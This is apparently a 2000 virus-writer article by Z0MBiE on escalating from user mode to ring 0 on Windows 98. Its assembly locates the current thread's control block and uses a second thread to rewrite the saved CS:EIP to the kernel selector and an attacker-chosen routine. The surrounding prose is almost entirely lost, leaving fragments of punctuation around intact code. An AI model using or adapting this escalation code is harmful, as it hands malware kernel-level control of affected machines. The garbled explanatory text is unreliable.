
                         win98:  ring-0  TCB
                         -------------------------

                              (x) 2000 Z0MBiE
                           http://z0mbie.host.sk

                 ring0,
    win98.        win9X.

           .      (thread)  
 ,    TCB (Thread Control Block).   
         ,      ,   
 , CS:EIP.   win9X, TCB,  ,  .

        TCB?   TCB   : 'THCB'.
        ,  , ,  
 win98   :

                        mov     eax, 4Fh    ; 4Fh/93h: i2E_xxGetCurrentThread
                        int     2Eh
                        mov     eax, [eax]  ; EAX <-- current TCB
                        mov     save_tcbptr, eax

       ,    CS:EIP       -- 
 ,       .

                        push    offset tid      ; *ThreadId
                        push    0               ; flags
                        push    12345678h       ; parameter
                        push    offset newthread; address
                        push    0               ; stack size. 0==same
                        push    0
                        callW   CreateThread

     ,   ,    :

                        push    1               ; while threads switching
                        callW   Sleep

      ,     .      ?

newthread:              pusha

                        mov     eax, save_tcbptr                ; main TCB
                        mov     eax, [eax].TCB_ClientPtr        ; registers

                        lea     ecx, ring0
                        xchg    ecx, [eax].Client_EIP           ; EIP
                        mov     save_eip, ecx

                        mov     ecx, 28h ; std. win9x ring0 selector
                        xchg    cx, [eax].Client_CS             ; CS
                        mov     save_cs, ecx

                        popa
                        retn

       ,      CS:EIP      .   
  ,      :

ring0:                  pusha
                        push    ds es

                        mov     eax, ss
                        mov     ds, eax
                        mov     es, eax

                        ;    

                        pop     es ds
                        popa

                        push    cs:save_cs
                        push    cs:save_eip
                        retf

     , ,  .    ?
